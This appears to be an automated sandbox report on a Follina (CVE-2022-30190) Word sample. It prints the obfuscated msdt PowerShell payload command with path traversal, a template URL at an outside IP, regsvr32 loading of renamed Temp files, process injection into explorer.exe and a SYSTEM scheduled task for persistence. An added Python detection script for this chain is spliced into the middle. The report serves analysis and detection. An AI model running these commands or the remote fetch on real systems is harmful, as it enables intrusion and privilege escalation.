Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_008277C4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_00821F0C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B02988
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B0358D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B08240
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B0670F
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B06350
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AB77C4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AB1F0C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AB58CA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AB58D4
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AB2B11
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 32_2_02F98240
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 32_2_02F96350
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 32_2_02F9670F
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 32_2_02F92988
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 32_2_02F9358D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_0499D447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_0499D959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042AD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042AD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AFD447 NtCreateSection,DefWindowProcW,RegisterClassExA,CreateWindowExA,DestroyWindow,UnregisterClassA,NtMapViewOfSection,NtMapViewOfSection,VirtualAllocEx,WriteProcessMemory,lstrlenW,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AFD959 GetThreadContext,NtProtectVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,
Source: DiagPackage.dll.mui.7.dr | Static PE information: No import functions for PE file found
Source: DiagPackage.dll.7.dr | Static PE information: No import functions for PE file found
Source: DiagPackage.dll.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DiagPackage.dll.7.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: jr3.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: jr3.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: jr3.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: jr3.dll
Source: doc782.docx | Virustotal: Detection: 28%
Source: doc782.docx | ReversingLabs: Detection: 17%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'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'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP"
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP"
Source: C:\Windows\SysWOW64\explorer.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"
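Added example (not Joe Sandbox code): detection logic over the process-creation chain listed above, run on constructed events whose command lines are taken from this report. It covers three links of the chain: WINWORD.EXE spawning msdt.exe with an ms-msdt: URI (CVE-2022-30190), explorer.exe registering a one-shot scheduled task as NT AUTHORITY\SYSTEM that runs regsvr32 on a renamed DLL in %TEMP%, and regsvr32 loading a non-.dll file from %TEMP%. It also folds the '[char]58' string-building inside IT_BrowseForFile back into readable PowerShell and decodes the embedded base64 as UTF-16LE, the encoding Unicode.GetString implies. The event format is an assumption, and because the report elides the real base64 the sample carries a constructed placeholder string in its place.

```python
"""Rules for the Follina -> schtasks(SYSTEM) -> regsvr32 chain, plus a
deobfuscator for the [char]NN string concatenation in the msdt parameter.
Added example; events are constructed and the stage-2 text is a placeholder."""
import base64
import re

OFFICE_IMAGES = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
TOKEN = r"(?:'[^']*'|\[char\]\d+)"
CONCAT = re.compile(TOKEN + r"(?:\s*\+\s*" + TOKEN + r")+")
PIECE = re.compile(r"'([^']*)'|\[char\](\d+)")
B64_CALL = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)')


def fold_concat(text):
    """Fold  'a'+[char]58+[char]58+'b'  back into the single literal 'a::b'."""
    def fold(m):
        out = []
        for lit, code in PIECE.findall(m.group(0)):
            out.append(chr(int(code)) if code else lit)
        return "'" + "".join(out) + "'"
    return CONCAT.sub(fold, text)


def decode_payload(folded):
    """Decode the first FromBase64String("...") argument: UTF-16LE when it
    feeds Unicode.GetString, UTF-8 otherwise. None when there is none."""
    m = B64_CALL.search(folded)
    if not m:
        return None
    enc = "utf-16-le" if "Unicode.GetString" in folded else "utf-8"
    return base64.b64decode(m.group(1)).decode(enc, errors="replace")


def analyze(events):
    """events: dicts with parent, image, cmdline. Returns a list of findings."""
    findings = []
    for ev in events:
        image = ev["image"].lower().rsplit("\\", 1)[-1]
        parent = ev.get("parent", "").lower().rsplit("\\", 1)[-1]
        cmd = ev["cmdline"]
        low = cmd.lower()

        if image == "msdt.exe" and "ms-msdt:" in low:
            m = re.search(r'IT_BrowseForFile=([^"]*)', cmd)
            value = m.group(1) if m else ""
            folded = fold_concat(value)
            findings.append({
                "rule": "follina_msdt",
                "office_parent": parent in OFFICE_IMAGES,
                "subexpression": "$(" in value,  # PowerShell $( ) inside a diagnostic parameter
                "folded": folded,
                "decoded_payload": decode_payload(folded),
            })

        if image == "schtasks.exe" and "/create" in low:
            as_system = re.search(r'/ru\s+"?(?:nt authority\\)?system"?', low) is not None
            i = low.find("/tr ")
            action = cmd[i + 4:] if i >= 0 else ""
            j = action.lower().find(" /sc ")
            if j >= 0:
                action = action[:j]
            if as_system and "regsvr32" in action.lower() and "\\appdata\\local\\temp\\" in action.lower():
                findings.append({"rule": "schtasks_system_regsvr32", "parent": parent, "action": action})

        if image == "regsvr32.exe":
            tokens = [a or b for a, b in re.findall(r'"([^"]+)"|(\S+)', cmd)]
            target = tokens[-1] if tokens else ""
            if "\\temp\\" in target.lower() and not target.lower().endswith((".dll", ".ocx", ".ax")):
                findings.append({"rule": "regsvr32_nondll_temp", "parent": parent, "target": target})
    return findings


# Constructed placeholder standing in for the base64 the report elides.
STAGE2_TEXT = "Write-Output constructed-stage2-placeholder"
STAGE2_B64 = base64.b64encode(STAGE2_TEXT.encode("utf-16-le")).decode()
MSDT_CMD = (
    "C:\\Windows\\system32\\msdt.exe\" ms-msdt:/id PCWDiagnostic /skip force /param "
    "\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression("
    "'[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58"
    "+'FromBase64String('+[char]34+'" + STAGE2_B64 + "'+[char]34+'))'))))"
    "i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"
)
SCHTASKS_CMD = r'"C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06'

SAMPLE_EVENTS = [  # constructed; command lines follow the report, the last one is a benign control
    {"parent": "C:\\Program Files (x86)\\Microsoft Office\\Office16\\WINWORD.EXE",
     "image": "C:\\Windows\\SysWOW64\\msdt.exe", "cmdline": MSDT_CMD},
    {"parent": "C:\\Windows\\SysWOW64\\explorer.exe",
     "image": "C:\\Windows\\SysWOW64\\schtasks.exe", "cmdline": SCHTASKS_CMD},
    {"parent": "unknown", "image": "C:\\Windows\\SysWOW64\\regsvr32.exe",
     "cmdline": r'"C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A'},
    {"parent": "C:\\Windows\\System32\\regsvr32.exe", "image": "C:\\Windows\\SysWOW64\\regsvr32.exe",
     "cmdline": r'regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A"'},
    {"parent": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s C:\Windows\System32\jscript.dll'},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f)
```

Two details carry most of the signal: the /RU "NT AUTHORITY\SYSTEM" on a task created from an explorer.exe that was itself spawned by regsvr32.exe, which is how the user-level infection reaches SYSTEM, and the `i/../../../` traversal appended to IT_BrowseForFile, which lets the PowerShell subexpression pass msdt's file-exists check by resolving to mpsigstub.exe.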
Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
Source: doc782.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\doc782.docx
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{F7EB1FF3-EBC0-4416-8F4D-8BB97AA1D04B} - OProcSessId.dat
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOCX@31/32@0/2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_0499E400 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,SysAllocString,CoSetProxyBlanket,
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_USERS.DEFAULT\Software\Borland\Delphi\Locales
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll (reported 9 times)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_0499B96A CreateToolhelp32Snapshot,Process32First,Process32Next,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{B70640EC-1F2A-4D99-888E-C770DEC0899F}
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{536EBBDF-F89D-4065-AD6A-DA847C33EC3A}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1548:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\explorer.exe (reported 6 times)
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next (reported 25 times)
Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: amstream.pdb | source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: amstream.pdbGCTL | source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049AB02E push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049901B0 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049AAD7C push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049AAE7E push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_049ACB5D push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042BB02E push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042BAD7C push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042A01B0 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042BAE7E push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_042BCB5D push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_00830790 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_0082A002 push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_0082A1B2 push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_00810334 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_0082BCE1 push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_0082E508 pushad ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_0082E638 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 28_2_00829F00 push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B0B02E push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AF01B0 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B0AD7C push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B0AE7E push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04B0CB5D push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AC0790 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04ABBCE1 push esi; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04ABE508 pushad ; retf
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04ABE638 push edx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AB9F00 push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04ABA002 push cs; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04ABA1B2 push ebx; ret
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 29_2_04AA0334 pushad ; iretd
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 27_2_0499EEBB LoadLibraryA,GetProcAddress,
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline
Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline

                            Persistence and Installation Behavior

                            Source: document.xml.rels Extracted files from sample: mhtml:http://185.234.247.119:80/123.res!http://185.234.247.119:80/123.res
                            Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.dll
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.dll
                            Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui
                            Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\DiagPackage.dll
                            Source: C:\Windows\SysWOW64\msdt.exe File created: C:\Windows\Temp\SDIAG_301dfb23-3df4-4f23-8ed0-e1654355ec0c\en-US\DiagPackage.dll.mui

                            Boot Survival

                            Source: C:\Windows\SysWOW64\explorer.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06

                            Hooking and other Techniques for Hiding and Protection

                            Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 4384 base: 90F380 value: E9 40 6E 67 02
                            Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 2256 base: 90F380 value: E9 40 6E 55 02
                            Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: PID: 5492 base: 90F380 value: E9 40 6E 5B 02
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (70 identical entries)
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX (39 identical entries)
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE Process information set: NOOPENFILEERRORBOX (8 identical entries)
                            Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOOPENFILEERRORBOX (6 identical entries)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (28 identical entries)
                            Source: C:\Windows\SysWOW64\regsvr32.exe Process information set: NOOPENFILEERRORBOX (3 identical entries)
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX (14 identical entries)
                            Source: C:\Windows\SysWOW64\schtasks.exe Process information set: NOOPENFILEERRORBOX (4 identical entries)
                            Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            Source: explorer.exe, 00000021.00000003.679709258.0000000003442000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
